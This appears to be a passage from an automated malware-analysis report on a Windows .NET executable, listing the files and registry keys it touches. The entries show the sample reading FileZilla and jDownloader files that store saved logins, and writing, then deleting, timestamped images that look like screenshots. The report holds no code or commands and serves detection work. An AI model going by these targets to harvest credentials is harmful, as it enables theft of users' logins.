C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.Configuration.INI C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\rasapi32.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\ws2_32.dll C:\Windows\Globalization\en.nlp C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\winhttp.dll C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\iphlpapi.dll C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\jDownloader\config\database.script C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.INI C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Read Files
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Users\Seven01\AppData\Local\Temp\PSA18.exe.config C:\Users\Seven01\AppData\Local\Temp\PSA18.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\System32\l_intl.nls \Device\KsecDD C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol21.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll \Device\NamedPipe\ C:\Windows\Branding\Basebrd\basebrd.dll C:\Windows\Globalization\Sorting\sortdefault.nls C:\Users\Seven01\Desktop\PSAA1.exe.config C:\Users\Seven01\Desktop\PSAA1.exe C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui C:\Windows\System32\tzres.dll C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\bc09ad2d49d8535371845cd7532f9271\System.Configuration.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\System.Management.ni.dll C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Write Files
C:\Users\Seven01\Desktop\PSAA1.exe C:\Users\Seven01\AppData\Local\Temp\PSA.txt C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2288.10840953 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2288.10840953 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2288.10840984 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2620.10842828 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2620.10842828 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2620.10842828 C:\ProgramData\SEVEN02-PC_2_22_3_4_1.jpg C:\ProgramData\SEVEN02-PC_2_22_4_25_1.jpg C:\ProgramData\SEVEN02-PC_2_22_5_47_1.jpg C:\ProgramData\SEVEN02-PC_2_22_6_8_1.jpg C:\ProgramData\SEVEN02-PC_2_22_7_29_1.jpg C:\ProgramData\SEVEN02-PC_2_22_8_51_1.jpg C:\ProgramData\SEVEN02-PC_2_22_10_13_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_35_1.jpg C:\ProgramData\SEVEN02-PC_2_22_11_56_1.jpg C:\ProgramData\SEVEN02-PC_2_22_13_17_1.jpg C:\ProgramData\SEVEN02-PC_2_22_14_38_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_0_1.jpg C:\ProgramData\SEVEN02-PC_2_22_16_21_1.jpg
Keys
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_CURRENT_USER\Software\Microsoft\.NETFramework HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PSA18.exe HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_CURRENT_USER\Software\Microsoft\Fusion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4dee4266\5e123865 HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName 